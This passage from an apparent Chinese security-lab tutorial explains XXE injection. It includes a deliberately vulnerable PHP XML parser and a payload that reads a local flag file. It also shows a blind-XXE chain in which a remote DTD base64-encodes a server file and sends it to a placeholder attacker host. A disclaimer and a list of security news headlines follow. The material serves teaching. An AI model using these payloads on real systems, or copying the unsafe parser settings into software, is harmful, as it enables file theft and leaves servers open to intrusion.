"<!ELEMENT mytag (subtag)>"> <!ENTITY % remote-dtd SYSTEM "http://somewhere.example.org/remote.dtd"> %an-element; %remote-dtd; 　抛转：参数实体在我们 Blind XXE 中起到了至关重要的作用 　有回显XXE 　这个实验的攻击场景模拟的是在服务能接收并解析 XML 格式的输入并且有回显的时候，我们就能输入我们自定义的 XML 代码，通过引用外部实体的方法，引用服务器上面的文件。 　本地服务器上放上解析 XML 的 php 代码： 　xml.php <?php    libxml_disable_entity_loader (false);    $xmlfile = file_get_contents('php://input');    $dom = new DOMDocument();    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);    $creds = simplexml_import_dom($dom);    echo $creds; ?> 　其中：LIBXML_NOENT: 将 XML 中的实体引用 替换 成对应的值LIBXML_DTDLOAD: 加载 DOCTYPE 中的 DTD 文件 　触发xxe <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe "Hello world!" >]> 　读取本地服务器C盘的flag文件 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE creds [   <!ENTITY goodies SYSTEM "file:///c:/flag"> ]> <creds>&goodies;</creds> 　引用外部实体读取文件 　引用方式是使用 引用公用 DTD 的方法读取 　无回显XXE 　有回显的情况可以直接在页面中看到Payload的执行结果或现象，无回显的情况又称为blind xxe，可以使用外带数据通道提取数据，先使用php://filter获取目标文件的内容，然后将内容以http请求发送到接受数据的服务器。 　xml.php <?php libxml_disable_entity_loader (false); $xmlfile = file_get_contents('php://input'); $dom = new DOMDocument(); $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); ?> 　test.dtd <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/xxx.txt"> <!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://xxx?p=file;'>"> 　payload <!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://ip/test.dtd"> %remote;%int;%send; ]> 　我们从 payload 中能看到 连续调用了三个参数实体 %remote;%int;%send;，这就是我们的利用顺序，%remote 先调用，调用后请求远程服务器上的 test.dtd ，有点类似于将 test.dtd 包含进来，然后 %int 调用 test.dtd 中的 %file, %file 就会去获取服务器上面的敏感文件，然后将 %file 的结果填入到 %send 以后(因为实体的值中不能有 %, 所以将其转成html实体编码 %)，我们再调用 %send; 把我们的读取到的数据发送到我们的远程 vps 上，这样就实现了外带数据的效果，完美的解决了 XXE 无回显的问题。 　这样，我们就读到了flag文件的内容。 　参考文章 　https://xz.aliyun.com/t/3357#toc-10 一篇文章带你深入理解漏洞之 XXE 漏洞 　实验推荐 　实验：第十四周 | blind xxe（蚁景网安实验室）　https://www.yijinglab.com/expc.do?ec=ECID9117-d620-481d-91f8-344e0ac69dea>>

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、周二补丁日：微软警告新的零日漏洞被利用 https://www.securityweek.com/patch-tuesday-microsoft-warns-new-zero-day-being-exploited 2、新的恶意软件样本表明 REvil 勒索软件卷土重来 https://www.securityweek.com/new-malware-samples-indicate-return-revil-ransomware 3、Adobe发布安全补丁修复产品中18个严重漏洞 https://www.securityweek.com/adobe-warns-critical-security-flaws-enterprise-products 4、微软修复了 Azure Synapse 和Data Factory中的 RCE 漏洞 https://securityaffairs.co/wordpress/131159/hacking/azure-synapse-rce.html 5、F5 BIG-IP 中的 CVE-2022-1388 RCE漏洞正在被大规模利用 https://securityaffairs.co/wordpress/131132/hacking/big-ip-cve-2022-1388-exploitation.html 6、美国伊利诺伊州林肯学院遭勒索软件攻击被迫关闭 https://www.nbcnews.com/tech/security/ransomware-attack-covid-combine-shutter-illinois-college-rcna24905 7、感染Joker木马的应用程序通过谷歌Play商店传播 https://thehackernews.com/2022/05/another-set-of-joker-trojan-laced.html 8、行车记录全暴露，高合汽车陷隐私泄露风波 https://www.secrss.com/articles/42165 9、马斯克收购 Twitter 可能面临美国的国家安全调查 https://arstechnica.com/tech-policy/2022/05/musks-foreign-investors-may-trigger-national-security-review-of-twitter-deal/ 10、法拉利子域被劫持以推送伪造的法拉利 NFT收藏 https://www.bleepingcomputer.com/news/security/ferrari-subdomain-hijacked-to-push-fake-ferrari-nft-collection/